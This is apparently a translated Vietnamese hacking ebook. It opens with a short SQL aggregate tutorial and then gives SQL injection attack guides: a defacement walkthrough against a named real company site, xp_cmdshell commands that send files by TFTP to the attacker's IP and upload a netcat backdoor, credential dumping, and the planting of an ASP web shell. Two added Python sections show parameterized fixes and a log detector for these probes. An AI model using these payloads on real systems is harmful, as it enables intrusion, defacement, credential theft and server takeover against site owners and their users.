SELECT SUM(Age) FROM Persons

result:

98

Example:

Find the total age of everyone older than 20:

SELECT SUM(Age) FROM Persons WHERE Age > 20

result:

79

GROUP BY and HAVING

Aggregate functions (such as SUM) often need the extra functionality of the GROUP BY clause.

GROUP BY...

GROUP BY... was added to SQL because aggregate functions (like SUM) return a single aggregate over all the values in a column each time they are called, and without GROUP BY there is no way to compute a total for each separate group of values in the column.

The syntax of GROUP BY is:

SELECT column_name, SUM(column_name) FROM table_name GROUP BY column_name

Example using GROUP BY:

Suppose we have the Sales table:

Company   | Amount
W3Schools | 5500
IBM       | 4500
W3Schools | 7100

The statement:

SELECT Company, SUM(Amount) FROM Sales

returns, on database systems that accept a non-aggregated column without GROUP BY (MS SQL Server rejects this statement outright):

Company   | SUM(Amount)
W3Schools | 17100
IBM       | 17100
W3Schools | 17100

This is not what we wanted. We add a GROUP BY clause to the statement:

SELECT Company, SUM(Amount) FROM Sales
GROUP BY Company

and this time the result is:

Company   | SUM(Amount)
W3Schools | 12600
IBM       | 4500

This is what we wanted.

HAVING...

HAVING... was added to SQL because WHERE cannot be applied to aggregate functions (like SUM). Without HAVING there would be no way to test a condition on an aggregate.

The syntax of HAVING is:

SELECT column_name, SUM(column_name) FROM table_name
GROUP BY column_name
HAVING SUM(column_name) condition value

Using the Sales table above, the statement:

SELECT Company, SUM(Amount) FROM Sales
GROUP BY Company
HAVING SUM(Amount) > 10000

returns:

Company   | SUM(Amount)
W3Schools | 12600
Aliases

With SQL, aliases can be given to column names and to table names.

Column alias:

The syntax of a column alias is:

SELECT column_name AS column_alias FROM table_name

Table alias:

The syntax of a table alias is:

SELECT column_name FROM table_name AS table_alias

Example using column aliases:

Given the Persons table:

LastName  | FirstName | Address      | City
Hansen    | Ola       | Timoteivn 10 | Sandnes
Svendson  | Tove      | Borgvn 23    | Sandnes
Pettersen | Kari      | Storgt 20    | Stavanger

the statement:

SELECT LastName AS Surname, FirstName AS GivenName
FROM Persons

returns:

Surname   | GivenName
Hansen    | Ola
Svendson  | Tove
Pettersen | Kari


DeFace bng SQL injection, C bn
(by sinhcv)
FOR NEWBIE
Hihi em xin tip tc,bi ny vn l c bn cho newbie,cn cao siu hn th em chu. y
em xin mn php ly thng Ford ra lm victim.Mc ch ca bi ny l s dng cc cu
lnh update,insert ,drop,delete... trong SQL deFace.
To 1 file c ni dung nh sau:

<body>
<form method="post"
action="https://www.ford.com.vn/Tuyendung/Jobs_Search_Action.asp"
name="frmSearch" onsubmit="return CheckSubmit();">
TIM KIEM <input name="txtSearch" size="40" class="clsText" type="text" size=2>
</br>
DIA DIEM <input type="text" name="SLocation" class="clsText" value="22"></br>
JOB <input type="text" name="SJobCategory" class="clsText" value=""> </br>
<input type=submit value="tim kiem"></br>
</form>
</body>


Save as li thnh file xx.html,sau run nh sau

TIM KIEM: xxx
DIA DIEM: 22
JOB: 1' SQL command --



Trong database ca n c table Fordvn_news vi cc column


MessageId','Status','Priority','Subject','Lead',
'Img','Posted','Edited','Published','FromIp','Body','ReadCount'



Corresponding to its news page
https://www.ford.com.vn/News/News.asp
Here I'll pick the subject with messageid=146 to deface

Then:
Here are the statements you need to know
Insert into user ("id","pas") values (1,"xxx")-- /* add a user xxx to the user table */
update user set pass="xxxx" where id=1-- /* change the password of the user with id=1 */
drop table user-- /* dangerous, deletes the user table */
drop database db-- /* very dangerous */
delete from user where id=1-- /* delete column */
..............
Here I use update

TIM KIEM: xxx
DIA DIEM: 22
JOB: 1' ;update fordvn_news set subject='TEST' where messageid=146--



If you get a message like this instead of an SQL error message, then it worked



Khng tm c theo yu cu ca bn!



OK come on
https://www.ford.com.vn/News/News.asp
You can do even more than I did; this is just an example.
Good luck !!!


Hacking a server vulnerable to SQL Injection
( Copyright by Windak )
( --Thanks bro Aclatinh and bro MRRO-- )

1) 80% success rate:
Requirements: the server must be WinNT and the user used for the injection must have the right to use xp_cmdshell (sa, dbo).
To check, you can do the following on the injection link:
[injection link] %2b convert (int,(system_user())
If the result is sa or dbo, you can probably attack it.
If you have sa or dbo but the admin has disabled cmdshell, turn it back on (how to turn it on, find out yourself)
Note: you will only be able to hack into the server that holds its database (often the database is on the same host)
Required tools: <-- find and download them yourself
tftpd32, backdoor
+++ Some hacking experience, knowledge of DOS commands and a little understanding of networking
2) Step-by-step approach
a) Concepts:
Note: my hacking method is not the only one, since there are many other ways; this method of mine works through the TFTP protocol.

Briefly about the TFTP protocol:
It is a server<->client file transfer protocol. It works similarly to FTP but is much simpler, over port 69, and one advantage is that it needs no password (this is the important point for our hack)

In DOS type tftp /? -> you will get its syntax as follows:
TFTP [-i] host PUT || GET filename [destination of the file]
-i : use it if you need to transfer a binary file
host : IP of the server machine
PUT : if you want to send a file
GET : if you want to fetch a file
Example of a tftp command:
Tftp i xxx.xxx.xxx.xxx PUT netcat.exe C:\nc.exe
Will take the file netcat.exe on the server machine (the machine with IP xxx.) and transfer it to C:\nc.exe on the client machine (the machine where the command above was typed)

Now we will test directly on localhost. Open tftpd32 to turn your machine into a tftp server (note: you must turn off all firewalls for the protocol to work properly).
In tftpd32 there is a BASE directory, by default [path to]\tftpd32e; it is the folder where your uploaded or downloaded files are placed when you exchange files with the client (since you are the server) (you can change it if you like).
In this article I use [link] in place of the link you inject; adjust it as needed to run exec (add (), ( if necessary).
And I use <IP> in place of your IP (it is displayed when you start tftpd32).
The actual attack:
-------------------------------BEGIN----------------------------------
Command 1 : RUN a DOS COMMAND on the victim machine :

[link] exec master..xp_cmdshell [command]

Command 2 : DOWNLOAD a FILE from the victim machine
[link] exec master..xp_cmdshell tftp <IP> PUT [path][filecandown]

Example : get the victim machine's IP :
(1)[link] exec master..xp_cmdshell ipconfig > a.txt
(2)[link] exec master..xp_cmdshell tftp <IP> PUT a.txt
----Explanation :
(1) : runs this command: ipconfig >a.txt <=> creates the file a.txt whose content is the output of the ipconfig command
(2) : runs tftp <IP> PUT a.txt <=> sends the newly created a.txt --> to the server (our machine)

Command 3 : UPLOAD a BACKDOOR to the victim machine :
[link] exec master..xp_cmdshell tftp [i] <IP> GET backdoor [path where the backdoor should be placed]

example : upload netcat to C:\WINNT:
[link] exec master..xp_cmdshell tftp i <IP> GET nc.exe C:\WINNT\nx.exe
----------------------------------END------------------------------

3) Conclusion:
So now we know how to run commands (you can run exe files), how to download and upload files; we practically own the server. How fast or slow, how effective the hack is, is up to you.
( If you find any errors when testing, please contact
http://shacker.computed.net/baivet/nangcao/windak88@yahoo.com )
Have fun hacking
SQL issues:
Advanced SQL Injection hacking
Let's look at an SQL query:
select id, forename, surname from authors
Here 'id', 'forename' and 'surname' are columns of the table authors; when this query runs it returns all rows in the authors table. Now look at the following query:
select id, forename, surname from authors where forename = 'john' and surname = 'smith'
This is a conditional query, as you surely know; it returns everyone in the database with forename = 'john' and surname = 'smith'

So what happens when the input entered does not match what the database expects:

Forename: jo'hn
Surname: smith

The query becomes:
select id, forename, surname from authors where forename = 'jo'hn' and surname = 'smith'
When this query is processed, it produces an error:

Server: Msg 170, Level 15, State 1, Line 1
Line 1: Incorrect syntax near 'hn'.

The reason is that we inserted a single quote "'", so the input value became 'hn', which does not match the database and produces an error. Exploiting this, an attacker can delete your data as follows:

Forename: jo'; drop table authors--
The authors table will be deleted -> dangerous, isn't it

Look at the following ASP code; it is a login form

<HTML>
<HEAD>
<TITLE>Login Page</TITLE>
</HEAD>
<BODY bgcolor='000000' text='cccccc'>
<FONT Face='tahoma' color='cccccc'>
<CENTER><H1>Login</H1>
<FORM action='process_login.asp' method=post>
<TABLE>
<TR><TD>Username:</TD><TD><INPUT type=text name=username size=100%
width=100></INPUT></TD></TR>
<TR><TD>Password:</TD><TD><INPUT type=password name=password size=100%
width=100></INPUT></TD></TR>
</TABLE>
<INPUT type=submit value='Submit'> <INPUT type=reset value='Reset'>
</FORM>
</FONT>
</BODY>
</HTML>
Here is the code of 'process_login.asp'
<HTML>
<BODY bgcolor='000000' text='ffffff'>
<FONT Face='tahoma' color='ffffff'>
<STYLE>
p { font-size=20pt ! important}
font { font-size=20pt ! important}
h1 { font-size=64pt ! important}
</STYLE>
<%@LANGUAGE = JScript %>
<%
function trace( str )
{
if( Request.form("debug") == "true" )
Response.write( str );
}
function Login( cn )
{
var username;
var password;
username = Request.form("username");
password = Request.form("password");
var rso = Server.CreateObject("ADODB.Recordset");
var sql = "select * from users where username = '" + username + "' and password = '" + password + "'";
trace( "query: " + sql );
rso.open( sql, cn );
if (rso.EOF)
{
rso.close();
%>
<FONT Face='tahoma' color='cc0000'>
<H1>
<BR><BR>
<CENTER>ACCESS DENIED</CENTER>
</H1>
</BODY>
</HTML>
<%
Response.end
return;
}
else
{
Session("username") = "" + rso("username");
%>
<FONT Face='tahoma' color='00cc00'>
<H1>
<CENTER>ACCESS GRANTED<BR>
<BR>
Welcome,
<% Response.write(rso("Username"));
Response.write( "</BODY></HTML>" );
Response.end
}
}
function Main()
{
//Set up connection
var username
var cn = Server.createobject( "ADODB.Connection" );
cn.connectiontimeout = 20;
cn.open( "localserver", "sa", "password" );
username = new String( Request.form("username") );
if( username.length > 0)
{
Login( cn );
}
cn.close();
}
Main();
%>

Here is the SQL query:

var sql = "select * from users where username = '" + username + "'and password = '" +
password + "'";

if the hacker enters the following:

Username: '; drop table users--
Password:

then the 'users' table will be deleted. We can also get past the login; you all know the
bypass already, so I won't repeat it (refer back to "Basics of hacking a website vulnerable
to SQL Injection")
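
The concatenated query in process_login.asp above and the search form in the defacement post earlier (the Fordvn_news table) share one defect: user input is pasted into the SQL text. The added example below is not code from this ebook or from any of its authors; it rebuilds both situations in Python over an in-memory SQLite database, using the users table from this article and a constructed news table standing in for Fordvn_news, and shows the parameterized form beside each vulnerable one. For the search, executescript is used on purpose to mimic a database that accepts ';'-separated stacked statements the way MSSQL does (a plain execute in SQLite would refuse the second statement). The two payloads are the ones already quoted on this page; the safe versions treat them as plain data.

```python
import sqlite3

# Constructed sample data. The users rows mirror the table shown in this
# article; the news table is a stand-in for the Fordvn_news table.
USERS = [
    (0, "admin", "r00tr0x!", 0xFFFF),
    (0, "guest", "guest", 0x0000),
    (0, "chris", "password", 0x00FF),
    (0, "fred", "sesame", 0x00FF),
]
NEWS = [(146, "Original headline"), (147, "Another headline")]


def make_db():
    """Fresh in-memory database with the two sample tables."""
    cn = sqlite3.connect(":memory:")
    cn.execute(
        "create table users(id int, username varchar(255), "
        "password varchar(255), privs int)"
    )
    cn.executemany("insert into users values(?,?,?,?)", USERS)
    cn.execute("create table news(messageid int, subject varchar(255))")
    cn.executemany("insert into news values(?,?)", NEWS)
    return cn


def login_vulnerable(cn, username, password):
    """String concatenation exactly as process_login.asp does it: a quote in
    the input ends the literal and the rest of the input becomes SQL."""
    sql = ("select * from users where username = '" + username
           + "' and password = '" + password + "'")
    return cn.execute(sql).fetchone()


def login_safe(cn, username, password):
    """Placeholders: the driver passes the values separately from the SQL
    text, so quotes, '--' and 'union' in the input stay data."""
    sql = "select * from users where username = ? and password = ?"
    return cn.execute(sql, (username, password)).fetchone()


def search_vulnerable(cn, job):
    """Concatenated LIKE search run as a batch so that a ';' in the input can
    start a second statement (what the ASP search on the page allowed)."""
    cn.executescript("select * from news where subject like '%" + job + "%'")
    return current_subject(cn)


def search_safe(cn, job):
    """Same search with the pattern bound as a parameter."""
    cn.execute("select * from news where subject like ?", ("%" + job + "%",))
    return current_subject(cn)


def current_subject(cn):
    """Subject of message 146, used to check whether the search changed data."""
    return cn.execute("select subject from news where messageid = 146").fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    union = "' union select 1, 'fictional_user', 'some_password', 1--"
    print(login_vulnerable(db, union, "x"))   # logged in as a user that does not exist
    print(login_safe(db, union, "x"))         # None: no such user
    deface = "1' ;update news set subject='TEST' where messageid=146--"
    print(search_safe(db, deface))            # Original headline
    print(search_vulnerable(db, deface))      # TEST
```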

In the username field the hacker can enter:

Username: ' union select 1, 'fictional_user', 'some_password', 1--

for example, suppose the users table was created as follows:

create table users( id int,
username varchar(255),
password varchar(255),
privs int
)

and populated with:

insert into users values( 0, 'admin', 'r00tr0x!', 0xffff )
insert into users values( 0, 'guest', 'guest', 0x0000 )
insert into users values( 0, 'chris', 'password', 0x00ff )
insert into users values( 0, 'fred', 'sesame', 0x00ff )

Hackers can learn the table and column names through the having 1=1 query

Username: ' having 1=1--

The resulting error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is
invalid in the select list because it is not contained in an aggregate
function and there is no GROUP BY clause.
/process_login.asp, line 35

Continue to get the rest:

Username: ' group by users.id having 1=1--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username'
is invalid in the select list because it is not contained in either an
aggregate function or the GROUP BY clause.
/process_login.asp, line 35

>> we learn the column 'username'

' group by users.id, users.username, users.password, users.privs having 1=1--

Stop when no more errors are reported; now you know the table and columns to exploit.
Next, retrieve their values:
To determine a column's data type we use the sum() function

Username: ' union select sum(username) from users--
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average
aggregate operation cannot take a varchar data type as an argument.
/process_login.asp, line 35

The username column is varchar; you can work out the reason yourselves. What about
id:

Username: ' union select sum(id) from users--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL
statement containing a UNION operator must have an equal number of
expressions in their target lists.
/process_login.asp, line 35

So we can insert into the database:
Username: '; insert into users values( 666, 'attacker', 'foobar', 0xffff)--

Get the server version:

Username: ' union select @@version,1,1,1--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug
6 2000 00:57:48 Copyright 1988-2000 Microsoft Corporation Enterprise
Edition on Windows NT 5.0 (Build 2195: Service Pack 2) ' to a column of
data type int.
/process_login.asp, line 35

convert() could be used, but I'll show you union; try reading the users in the table as
follows:

Username: ' union select min(username),1,1,1 from users where username > 'a'--

Select the smallest username greater than 'a' -> an error results:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value 'admin' to a column of data type int.
/process_login.asp, line 35

So we know the 'admin' account exists; let's continue:

Username: ' union select min(username),1,1,1 from users where username > 'admin'--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value 'chris' to a column of data type int.
/process_login.asp, line 35

Once we have a username -> get the password:

Username: ' union select password,1,1,1 from users where username ='admin'--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value 'r00tr0x!' to a column of data type int.
/process_login.asp, line 35

Here is a more advanced technique for retrieving the users:

Create a script like this:
begin declare @ret varchar(8000)
set @ret=':'
select @ret=@ret+' '+username+'/'+password from users where
username>@ret
select @ret as ret into foo
end

-> the query:

Username: '; begin declare @ret varchar(8000) set @ret=':' select
@ret=@ret+' '+username+'/'+password from users where username>@ret
select @ret as ret into foo end--

This creates a table 'foo' with one column 'ret'

Then:

Username: ' union select ret,1,1,1 from foo--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value ': admin/r00tr0x! guest/guest chris/password
fred/sesame' to a column of data type int.
/process_login.asp, line 35

(I think mrro used this method on VDC)

Cover the tracks:

Username: '; drop table foo--

Once a hacker controls the database, they want to go further and control the server's
system and network as well; some of the ways:

1- Use xp_cmdshell when you have 'sa' rights
2- Use xp_regread to read the registry, including the SAM
3- Run linked queries on the server
4- Create scripts on the server to exploit it
5- Use 'bulk insert' to read any file on the system
6- Use bcp to create text files on the server
7- Use sp_OACreate, sp_OAMethod and sp_OAGetProperty to create (ActiveX) scripts that
run on the server

[xp_cmdshell]

You have surely heard a lot about this already; for example:
exec master..xp_cmdshell 'dir'
exec master..xp_cmdshell 'net1 user'

Used to execute DOS commands and so on; very effective

[xp_regread]

Related procedures...

xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite

Example:

exec xp_regread HKEY_LOCAL_MACHINE,
'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters','nullsessionshares'

Determines whether null-session shares exist on the server

exec xp_regenumvalues HKEY_LOCAL_MACHINE,
'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'

etc.. and much more

[Other Extended Stored Procedures]
services:
exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'

> Reading it over you can tell what it does...

[Importing text files into tables]

Use 'bulk insert' to load a text file into a table; first create the table:

create table foo( line varchar(8000) )
then:
bulk insert foo from 'c:\inetpub\wwwroot\process_login.asp'

[Creating Text Files using BCP]

Example:
bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar
[ActiveX automation scripts in SQL Server]

Using 'wscript.shell'

example:

declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
In the query:

Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod
@o, 'run', NULL, 'notepad.exe'--

Using 'scripting.filesystemobject' to read a file:
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end

Create an ASP script that executes commands:

declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out,
'c:\inetpub\wwwroot\foo.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,
'<% set o = server.createobject("wscript.shell"): o.run(
request.querystring("cmd") ) %>'
These are methods you can use very effectively; build on these basic pointers with your
own creativity.

SQL Injection: commands
I'm sure most of you here only know SQL injection for bypassing logins. Today I'd like to
present some techniques that let us do much more than just get past the password of a
site vulnerable to SQL injection.
Note: most of the knowledge below applies only to servers running MySQL or MSSQL; for
others I'm not sure.... If you don't know SQL statements yet you shouldn't read this article;
study them first, OK??? I don't want to see replies like --- "I don't understand anything",
"Where do you use this",.....

1) Get the current table and column names:
Structure :

Login page (or any injection page)::::
username: ' having 1=1--

Result: -------------------------------
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.ID' is invalid in
the select list because it is not contained in an aggregate function and there is no GROUP
BY clause.
--------------------------------------
----> We get the TABLE VICTIM

Next
username: ' group by VICTIM.ID having 1=1--

Result :---------------------------------
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.Vuser' is invalid
in the select list because it is not contained in either an aggregate function or the GROUP
BY clause.
-------------------------------------------
So we have the column Vuser

2) UNION: small but effective

Yes folks, we can use it to get almost everything.
First let me go briefly over its structure:

Login page ::::

username : ' Union select [column] from [table] where [column2=...]--
password : everything

Example: suppose we know that the two columns for username and password in the table
VTABLE of the victim's db are VUSER and VPASS; then we do the following

username : ' Union select VPASS from VTABLE where VUSER='admin'-- (1)
password : everything

(1) : In this case admin is a user you know; if not, you can leave it blank and it will give
you the first user

Result:-----------------------------
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement
containing a UNION operator must have an equal number of expressions in their target
lists.
---------------------------------

If the result looks like the above, it means you must union more columns until all the
columns of the table VTABLE are covered. Its structure is as follows:

username : ' Union select VPASS,1,1,1...1,1 from VTABLE where VUSER='admin'-- (1)
password : everything

Keep adding ",1" until the result looks something like

--------------------------------
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'tuibihackroi' to a column of data type int.
--------------------------------

So the password of the user 'admin' is 'tuibihackroi'


Yes folks, SQL injection is really interesting, and here is what we can do in today's article:
take the opponent's entire database.

3) Get all values of a known column in a known table
The trick here is Not in. Its structure is as follows (using the columns from the previous
example):
With Vuser being admin we can get the other users

-----Login Page ::::::
username: Union select Vuser,1,1,1,1 from Vtable where username not in
(admin)
-------------------------
Then we get one more user, and we just add it to the Not in (e.g. Not in (admin,hacker,...));
keep going like that and we get every user (and of course every password after that).

**** To get a list of user names matching a rule you choose, for example only users
containing the word admin, we use like; structure:

-----Login Page ::::::
username: Union select Vuser,1,1,1,1 from Vtable where username not in (admin)
like %admin%
-------------------------

4) Get all tables and columns of the database:
The trick is this table of the database: INFORMATION_SCHEMA.TABLES with the column
TABLE_NAME (holding all the tables), and the table INFORMATION_SCHEMA.COLUMNS
with the column COLUMN_NAME (holding all the columns)

Usage with Union:

-----Login page :::::::
username: UNION SELECT TABLE_NAME,1,1,1,1 FROM
INFORMATION_SCHEMA.TABLES WHERE .
---------------------------

This way we can get all the tables; once we have a table we get all its columns:

-----Login page :::::::
username: UNION SELECT COLUMN_NAME FROM
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME= and
---------------------------

The above are the most basic things about SQL injection I can give you; doing it well still
takes a bit of creativity. I hope it helps you a little when you run into a site vulnerable to
SQL injection

5) Without UNION:
If you'd rather avoid Union because of its inconveniences, you can use "Convert" more
easily to gather info through the error messages

Structure :

---login page::::

user : ' + convert (int,(select @@version))--
-------------------------

Above is an example of getting the version; now to get any info at all you only need to
replace the "select @@version", but remember, if it is the first time you get info, add
TOP 1

vd: user : ' + convert (int,(select Vpass from Vtable where Vuser='admin'))--

Note: if it doesn't work for you, it may be because the + sign is not accepted; in that case
replace it with %2b

vd: user : ' %2b convert (int,(select Vpass from Vtable where Vuser='admin'))--

6) Run SQL commands :

To run a command you can use the ";" sign

Structure :

login page :::::
user :' ; [command]--
-----------------------------

vd: '; DROP TABLE VTABLE--
If you know SQL well you can do many interesting things with this, but I'll leave the rest
for you to research yourselves.
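
As an added example that is not from this ebook, a small Python detector that scans constructed IIS-style W3C log lines (date, time, client IP, method, URI stem, query, status) for the probes described in this article and in the xp_cmdshell/TFTP section earlier: having 1=1, group by ... having, union select, convert(int, ...), INFORMATION_SCHEMA, ';'-stacked statements, xp_cmdshell and tftp. The query string is decoded the way the server would decode it (so %2b becomes + and + becomes a space), then matched case-insensitively. The log lines, client IPs and paths are constructed for the example; the request paths reuse the VP-ASP and Ford pages named elsewhere in this ebook.

```python
import re
from urllib.parse import unquote_plus

# Indicator names and patterns for the techniques shown on this page.
INDICATORS = [
    ("having-probe",       re.compile(r"\bhaving\s+1\s*=\s*1")),
    ("group-by-probe",     re.compile(r"\bgroup\s+by\b[^;]*\bhaving\b")),
    ("union-select",       re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("convert-int-error",  re.compile(r"\bconvert\s*\(\s*int\s*,")),
    ("information-schema", re.compile(r"\binformation_schema\.(tables|columns)\b")),
    ("stacked-statement",  re.compile(r";\s*(update|insert|delete|drop|exec(ute)?|declare)\b")),
    ("xp_cmdshell",        re.compile(r"\bxp_cmdshell\b")),
    ("tftp-transfer",      re.compile(r"\btftp\b")),
    ("registry-or-ole",    re.compile(r"\b(xp_reg\w+|sp_oacreate|sp_oamethod|bulk\s+insert)\b")),
]

# Constructed sample log (W3C fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status).
SAMPLE_LOG = """\
2024-05-01 10:00:01 10.0.0.5 GET /shop/shopdisplayproducts.asp id=6 200
2024-05-01 10:00:02 10.0.0.9 GET /shop/shopdisplayproducts.asp id=6'+having+1=1-- 500
2024-05-01 10:00:03 10.0.0.9 GET /shop/shopdisplayproducts.asp id=6'+group+by+VICTIM.ID+having+1=1-- 500
2024-05-01 10:00:04 10.0.0.9 GET /shop/shopdisplayproducts.asp id=6'+union+select+TABLE_NAME,1,1,1,1+from+INFORMATION_SCHEMA.TABLES-- 500
2024-05-01 10:00:05 10.0.0.9 GET /shop/shopdisplayproducts.asp id=6+%2b+convert(int,(select+@@version))-- 500
2024-05-01 10:00:06 10.0.0.9 GET /shop/shopdisplayproducts.asp id=6;exec+master..xp_cmdshell+'tftp+-i+198.51.100.7+GET+nc.exe'-- 200
2024-05-01 10:00:07 10.0.0.12 POST /Tuyendung/Jobs_Search_Action.asp - 200
""".splitlines()


def normalise(query):
    """Decode as the server would (%xx escapes, '+' as space, so %2b becomes
    a literal '+'), then lower-case and squeeze whitespace for matching."""
    text = unquote_plus(query)
    return re.sub(r"\s+", " ", text.lower())


def scan_line(line):
    """Parse one W3C-style line. Returns (client_ip, uri_stem, [indicator names])
    or None when the line does not have the expected seven fields."""
    parts = line.split()
    if len(parts) != 7:
        return None
    _date, _time, ip, _method, stem, query, _status = parts
    text = normalise(query)
    hits = [name for name, rx in INDICATORS if rx.search(text)]
    return ip, stem, hits


def scan_log(lines):
    """Return the flagged requests and a per-client-IP hit count."""
    flagged = []
    per_ip = {}
    for line in lines:
        parsed = scan_line(line)
        if parsed and parsed[2]:
            flagged.append(parsed)
            per_ip[parsed[0]] = per_ip.get(parsed[0], 0) + 1
    return flagged, per_ip


if __name__ == "__main__":
    hits, counts = scan_log(SAMPLE_LOG)
    for ip, stem, names in hits:
        print(ip, stem, ", ".join(names))
    print(counts)   # {'10.0.0.9': 5}
```

Real IIS logs carry a #Fields: header that fixes the column order, so adjust scan_line to it before use. The hit count per client IP is the natural pivot for an alert, and a 500 status on the flagged requests is the usual sign that the verbose ODBC error text this article relies on is reaching the client.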


End of the ebook. Good luck. Hacking is just about learning and exchanging security
skills.
http://thegioiebook.com
